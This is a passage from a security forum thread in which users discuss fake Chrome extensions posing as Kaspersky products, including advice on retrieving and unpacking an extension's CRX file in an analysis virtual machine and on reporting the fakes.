Geez! As a general rule I never install or enable any browsing protection extensions. But, if I did I might have fallen for one of those easily... How is the average user going to be able to tell the difference? It even says "offered by Kaspersky Lab" making you think that the owner is legitimate..

 

[ichito]

Geez! As a general rule I never install or enable any browsing protection extensions. But, if I did I might have fallen for one of those easily... How is the average user going to be able to tell the difference? It even says "offered by Kaspersky Lab" making you think that the owner is legitimate..

Absolutely agree...it's shocking but if we want to be fair we should know something like "official statement" of developers.

 

[giulia]

I just compressed the unpacked content of the extension installed in my Chrome browser, and then sent it to KL VirusDesk, that was the results

hi harlan4096
i have used a virtual machine ,but how can you download without installing a chrome extension?
thanks

Geez! As a general rule I never install or enable any browsing protection extensions. But, if I did I might have fallen for one of those easily... How is the average user going to be able to tell the difference? It even says "offered by Kaspersky Lab" making you think that the owner is legitimate..

Hi DeepWeb , think about how many normal user or young users or older users
thanks

 

[Deleted member 65228]

i have used a virtual machine ,but how can you download without installing a chrome extension?

You can find an online *.CRX down-loader from the Google Chrome web store URL or install the extension and then navigate to [SYSTEMDRIVE]:\Users\[USERNAME]\AppData\Local\Google\Chrome\User Data\Default\Extensions

Replace [SYSTEMDRIVE] with the system drive (e.g. "C:\") and replace [USERNAME] with the account name for the user account (e.g. "Opcode", "Analysis", "Bob", etc.).

Under the folder you will find other folders where each one represents an installed extension. If you're in an analysis environment for inspection/malware testing, it should be secure and therefore you can install extensions which are suspicious/malicious for investigation (and thus inspect further with the source files this way). Alternatively, use a CRX download so you don't have to install the extension as well, and unpack it via unzipping it with a software like 7zip -> now you have a folder with the source files.

Bear in mind even on a normal Host system you should not be downloading the CRX alone even if it won't be active. Accidents can happen, stick to the analysis environment at all times for safety precaution. Watch out for some CRX download sites as well because Google Chrome may automatically attempt to install the extension after the download depending on how the download is activated/performed in-browser.

 

[CoherentCrayon]

I reported all 3 extensions for faking the developer, which seems extremely easy to do on Chrome Web Store, and you can't easy tell if it's fake just by looking at the developer info, because they point straight to the official websites...